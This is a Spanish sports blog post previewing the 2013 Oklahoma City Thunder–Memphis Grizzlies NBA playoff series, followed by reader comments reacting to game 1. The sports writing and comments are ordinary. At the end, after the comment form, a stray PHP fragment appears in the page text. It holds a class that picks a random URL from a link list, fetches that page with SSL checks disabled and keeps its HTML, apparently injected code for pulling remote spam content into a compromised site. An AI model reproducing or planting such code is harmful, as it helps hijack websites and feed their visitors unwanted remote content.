Previa Oklahoma City Thunder – Memphis Grizzlies

05 de May de 2013 por Sancho88

Muchos podrían pensar que nos encontramos ante una eliminatoria desequilibrada, donde el favorito claro y absoluto son los Grizzlies, que están imparables, y los Thunder sin Westbrook son como los Cavs de LeBron (como apuntaba Esteban el otro día y he podido yo incluso llegar a pensar alguna vez). Es posible. Ahora bien, los Cavs de LeBron no eran para nada fáciles de ganar en unos Playoffs, al igual que no lo son los Thunder de Kevin Durant. Llegan las semifinales en el Oeste y empezamos a hablar de palabras mayores. Tanto Thunder como Grizzlies consiguieron la clasificación en el sexto juego, aunque las sensaciones son contradictorias. Por un lado, los Thunder tuvieron que superar el ‘mazazo’ psicológico de perder a su segunda espada (Russell Westbrook), dando muchas sensaciones de debilidad frente a los Rockets, y por el otro, Memphis arrolló a los Clippers durante 4 partidos consecutivos (tras perder los dos primeros) y ahora parecen imbatibles. Pues ni tanto, ni tan calvo.

Veamos. Memphis ha conseguido crear lo que se llama comúnmente ‘sinergia de grupo’. Así funcionaban los ‘Bad boys’ de finales de los 90, así funcionaban los ‘Bad boys’ de mediados de 2000 y así funcionaban también los Miami Heat de 2006. Son estilos muy válidos para ganar un anillo de campeón en la NBA, estilos que han dado resultados (y seguirán dando resultados). Sin un grandísimo referente, tenemos 5 muchachos que como equipo dan mucho miedo, tenemos otros 3 o 4 muchachos en el banquillo que también saben jugar a este deporte, tenemos un entrenador que ha conseguido deshacerse del ‘ego’ (Gay) que mataba a su equipo, y ahora todo y todos tienen por fin sentido. Memphis funciona, y lo hace con la coherencia de jugar al baloncesto con las reglas de la lógica. Si tienes una pareja interior que se entiende, mételes balones dentro y a disfrutar del juego en estático. Si tu base titular es un fiera dividiendo por la zona, ponle buenos bloqueos y adelante. Si tienes atrás todo un entramado de cerebros defensivos, ponles a defender a muerte. Y hay poco más. Es lo bueno de los Grizzlies, hacen un baloncesto previsible, un baloncesto no demasiado vistoso, pero sí un baloncesto inteligente.

Y a eso es a lo que se tiene que enfrentar Oklahoma. A Durant no le vale esta vez salir corriendo desde su cancha para hundirla en el aro en 5 segundos como en primera ronda contra los Rockets. Esta vez no. Ahora tendrá que superar a una de las mejores defensas de la liga en el 5 para 5, a un pegajoso Tony Allen, quien a buen seguro ayudará en el 2×1 a un ‘abuelete’ pero rejuvenecido Tayshaun Prince, y a las ‘twin towers’ más de moda, o ‘Zipi y Zape’ como les hemos bautizado en el blog: Randolph y Gasol. Randolph es el gemelo Zipi, el ‘trasto’, el especialista en ‘trash talk’ y trifulcas (acordémonos de las que liaba en su etapa en NY), el hombre que te puede hacer el abrazo del oso; mientras que Marc es Zape, el más ordenado de los dos, el cerebrín del grupo, el líder de la manada. No obstante, ambos son inseparables e igualmente peligrosos para Oklahoma. Sus 40 puntos y 20 rebotes entre los dos no se los quita nadie.

Y no sabemos quién será Pantuflo en los Thunder, es decir, el padre gruñón. Kendrick Perkins tiene muchas papeletas, pero vete a saber. Con la primera ronda sabática que se ha tomado el tío seguramente le toreen por todos lados. Solo le hemos visto ‘autocastigarse’ haciendo flexiones, gruñendo contra García a ver quién daba más miedo de los dos, y poco más. Por eso, Ibaka tiene que convertirse en ‘Air Congo’ otra vez y ser más consistente. Nos dejó buenas actuaciones en primera ronda, pero también partidos grises. Si los Thunder quieren tener alguna ocasión de llegar a las finales del Oeste, Serge tiene que ponerse las pilas y ayudar a Durant. Sea como fuere, que nadie se piense que esta eliminatoria se resolverá en cuatro o cinco partidos. Más bien tiene toda la pinta de llegar al séptimo.

Claves de la eliminatoria:

  • Divide y vencerás: Es un proverbio tan antiguo como válido hoy en día, y es el proverbio que se tiene que grabar a muerte Kevin Durant. El ‘MVP’ virtual de estos Playoffs hasta el momento por puntos y eficiencia (lleva 32 partidos consecutivos en Playoffs sin bajar de los 20 puntos, que se dice pronto) tiene que encontrar aliados. Sin Westbrook para cocinarse el 80% de las acciones ofensivas entre los dos, se nos presentan tres señores que pueden ayudar: Ibaka, Martin y Reggie Jackson (además del comodín de la llamada, el ‘pescador’ Fisher, obviamente). Estos señores, básicamente son tíos que se abren y reciben. Y punto. Ahora bien, si Durant sabe encontrarlos, le alimentarán con puntos, de eso no cabe duda. Talento tienen de sobra, pero ‘KD’ no puede desaprovecharlos. Sefolosha también tiene que espabilar y anotar sus canastas desde la esquina, y Jackson ha demostrado que es capaz de fabricarse sus propios tiros. Veremos si no se ahogan colectivamente ante la defensa ‘ladrona’ de los Grizzlies.
  • Conley & Marc: Son la estructura clave de estos Grizzlies, aparte de la otra sociedad Z-Bo & Marc. Entre ambos reparten 12 de los 21 pases de canasta por partido de los Grizzlies en estos Playoffs. Y eso es más del 50%. Ya decimos, siempre elaborando jugadas sencillas, combinándose al poste alto (jugando Pick & Roll o Pick & Pop entre los dos), metiendo balones a Randolph en la zona o abriendo a las esquinas para Prince y Allen o doblándoles balones hacia dentro (especialidad de ‘Tanqueta’). En esta eliminatoria deben seguir explotando este tipo de jugadas, sacar a Ibaka lejos de la canasta y no permitir manos rápidas de Durant, Sefolosha y compañía. De momento, Conley solo pierde 1,7 balones por partido, y Marc ni siquiera llega a 1. Esa es la tónica del equipo, 10 pérdidas por partido, que son una cifra asumible. En este aspecto Oklahoma también se ha puesto las pilas con respecto a la Regular, pero su ratio es de 13 pérdidas.
  • Desequilibrio en la pintura: Claro, este es el factor más obvio de la eliminatoria. Viendo el destrozo de Marc y Zach contra la defensa angelina, podemos prever que sucederá lo mismo contra los Thunder. Pero no es tan sencillo todo esto. El año pasado ya comprobamos como Duncan y Splitter se convirtieron en marionetas de Perkins e Ibaka. Lo que no sabemos es si los milagros ocurren todos los días, si todos los domingos son fiesta o si la prima de riesgo subirá este fin de semana de 300 puntos. Eso no lo sabemos. A priori, el destrozo debería ser considerable, pero Collison no lo está haciendo mal saliendo desde el banquillo, Ibaka solo puede ir a mejor, y Perkins, obviamente también. Así que la cosa se iguala.

Pronóstico: 4-3. A priori, Oklahoma debería hacer valer el factor cancha. La serie tiene pinta de ser muy igualada y decidirse al final, pero si llegan al séptimo Durant no puede dejar escapar esa opción de alcanzar la final. Los grandes nunca pierden.

Comenta

24 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Pues yo apuesto por un 2-4, creo que los Thunder se apagarán bastante en ataque.

      Citar

  2. rumbero dice:
    #2

    Lo veo muy igualado. Clave la defensa que puedan hacer Ibaka-Perkins-Collison. Si Zipi y Zape campan a sus anchas lo van a tener muy difícil pero para mi un equipo donde juega Durant siempre es más favorito (si delante no está Lebron claro)

      Citar

  3. MagicJohnson32 dice:
    #3

    Muy bien va a tener que jugar Kevin Martin para que tengan opciones los Thunder. No sé, no lo veo.

      Citar

  4. rumbero dice:
    #4

    Pondexter desde su casa!! +9 Grizzlies
    Martin está dando el callo pero con Ibaka y Perkins a este nivel desde luego que lo van a tener imposible.

      Citar

  5. Denise dice:
    #5

    Una jodida visita familiar me ha fastidiado ver el Thunder-Grizzlies. Aquí llego para el ultimo minuto..

      Citar

  6. Denise dice:
    #6

    Ufff como está esto, 86-88 para Grizzlies a minuto y medio para el final. 2 tiros libres para Ibaka

      Citar

  7. rumbero dice:
    #7

    Esto o lo salvan Durántula o Fisherman o 0-1 para los osos

      Citar

  8. Denise dice:
    #8

    Durantula!!! 1 arriba OKC. Faltan 11 segundos. Y vaya robo de Fisher a Conley

      Citar

  9. Denise dice:
    #9

    Ultima bola para Memphis para ganar el partido. Si ganan, yo creo que mazazo piscologico para OKC

      Citar

  10. Denise dice:
    #10

    Vaya manera de cagarla de Memphis, especialmente Conley.

      Citar

  11. Denise dice:
    #11

    Llamadme ventajista pero las dos cagadas de conley de que le roben el balón y luego hacer un Out of Bounds no le hubiera pasado a un tio como Rudy Gay que no le quema el balón en las manos. Quizas la falle, pero al menos tira a canasta y siempre tienes la posibilidad de que entre.

      Citar

  12. Denise dice:
    #12

    Jackson a los tiros libres. Veremos si le tiembla la muñeca. 1 arriba OKC a 3 seg.

      Citar

  13. Denise dice:
    #13

    Mete los 2, 3 arriba OKC y tiempo muerto para Grizzlies. ¿Haran falta los Thunder?

      Citar

  14. Denise dice:
    #14

    Woooo, falta de OKC pero cuando Pondexter tiraba de 3.

    3 tiros libres para empatar!!

      Citar

  15. Jose Luis dice:
    #15

    Vaya oportunidad han perdido los Grizzlies…

      Citar

  16. Denise dice:
    #16

    Falla el primero, mete el segundo, el tercero lo tira a fallar pero OKC coge el rebote.

    1-0 para OKC, gana 93-91. Solo he visto los 2 ultimos mintos, no sé lo que habrá pasado en los 46 restantes, pero en lo poco que he visto, Memphis ha tirado el partido a la basura con enormes errores propios de jugadores cagados debido a la inexperiencia de afrontar este tipo de partidos.

      Citar

  17. MagicJohnson32 dice:
    #17

    Vaya partido han regalado los Grizzlies. Terrible final.

      Citar

  18. rumbero dice:
    #18

    Denise:
    Falla el primero, mete el segundo, el tercero lo tira a fallar pero OKC coge el rebote.
    1-0 para OKC, gana 93-91. Solo he visto los 2 ultimos mintos, no sé lo que habrá pasado en los 46 restantes, pero en lo poco que he visto, Memphis ha tirado el partido a la basura con enormes errores propios de jugadores cagados debido a la inexperiencia de afrontar este tipo de partidos.

    Es más o menos eso. El partido era para Memphis al que se ha visto más sólido durante el partido, pero la han cagado al final, y eso el amigo Durant no lo perdona. Por eso decía que para mi eran más favoritos simplemente porqué está él. Pero Oklahoma tendrá que ser algo productivo en la pintura porque Fisher si va estar para meter ese par de triples clave pero Martin no se va a ir a los 25 puntos cada noche. Pinta a serie larga.

      Citar

  19. MagicJohnson32 dice:
    #19

    Denise:
    Llamadme ventajista pero las dos cagadas de conley de que le roben el balón y luego hacer un Out of Bounds no le hubiera pasado a un tio como Rudy Gay que no le quema el balón en las manos. Quizas la falle, pero al menos tira a canasta y siempre tienes la posibilidad de que entre.

    Sí pero la segunda es una cagada de Marc, que se marca un pasecito horrible cuando quedan 5″ de posesión.

      Citar

  20. kantonyo dice:
    #20

    Memphis ha sido mejor equipo durante todo el encuentro, se confirma que Marc y Zach son la mejor pareja de interiores de la liga.

    La diferencia ha estado en los tiros libres 14 de 24 y en la sola presencia de Durant, que a pesar de las ganas que le ha puesto Prince para defenderle su actuación ha sido brillante.

    Los Grizzlies se tienen que quitar el complejo, pueden ganar esta serie, pero no lo pueden dejar para los últimos segundos, ahí están vendidos.

    No creo que Kevin Martin pueda jugar dos partidos a esa nivel en estos momentos, tienen que aprovechar que ahora en OKC sólo está Durant…

      Citar

  21. Jose Luis dice:
    #21

    LET’S GO GRIZZLIES! 1-1!

      Citar

  22. Vader dice:
    #22

    Ojo con los grizzlies que como se planten en la final contra Miami les pueden hacer mucho daño…

    Saludos!!

    Go Knicks!!

      Citar

  23. GreenPride dice:
    #23

    Series de lo más interesantes y en principio listas para un asalto de Memphis al orden establecido tras la lesión de Westbrook.
    Por los Thunder todo comienza en Durant pero muere en los demás. Es decir, Durant va a jugar fenomenal pero esta vez tiene delante una defensa de aúpa así que va a tener que compartir la bola y rezar para que Jackson, Fisher, Martin e Ibaka le acompañen todo lo posible en ataque. Si lo consigue y estos 4 están a buena altura ofensiva los Thunder pueden conseguir hacerse con la eliminatoria…. siempre y cuando consigan para el juego interior de los Grizzlies.
    Está claro que ahí va a jugarse gran parte de las series. Si Marz&Zach dominan ambas pinturas como quieran Memphis tendrá muchas papeletas para llevarse las series. En principio son claramente mejores que sus pares Thunder pero Perkins e Ibaka deben sacar a relucir sus aptitudes defensivas para ponerles en problemas. Si consiguen nivelar algo la balanza será una gran noticia para los de Oklahoma.
    La otra clave puede ser el ritmo de juego. A los Thunder les interesará jugar lo más rápido posible para encontrar canastas antes de que la defensa Grizz esté formada y con sus bastiones interiores colocados. Por el otro lado Memphis debe aprovechar sus robos para contraatacar cuando pueda y si no jugar balones interiores para hacer valer su superioridad interior.
    Series muy bonitas que pueden elevar a Durant a la leyenda pero en las que la cabeza me hace decir un Memphis en 6 como ganador

      Citar

  24. Denise dice:
    #24

    GreenPride: pero Perkins e Ibaka deben sacar a relucir sus aptitudes defensivas para ponerles en problemas.

    Darme palos pero Ibaka es que siempre me ha parecido un correcto defensor en el 1×1 y poco más. En las ayudas si es bueno porque tiene un buen salto, timing y brazos largos para taponar, aunque va tanto a por el gorro que se come unas fintas de aúpa, pero en el 1×1 no me parece un especialista. Ibaka siempre me ha parecido muy sobrevalorado.
    Los mejores años de Perkins ya han pasado, y tampoco en Boston es que fuera la leche, solo que los arbitros permitian dar palos a diestro y siniestro.

    Los Thunder son malos si Westbrook no está y muy malos si el que no está es Durant. No soy ventajista, yo ni al principio de PO cuando estaba Westbrook los puse como favoritos, a mi, en global, me parece una plantilla muy mediocre que gracias a las aptitudes magnificas de KD y RW hacen bueno al equipo y tapar sus carencias.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>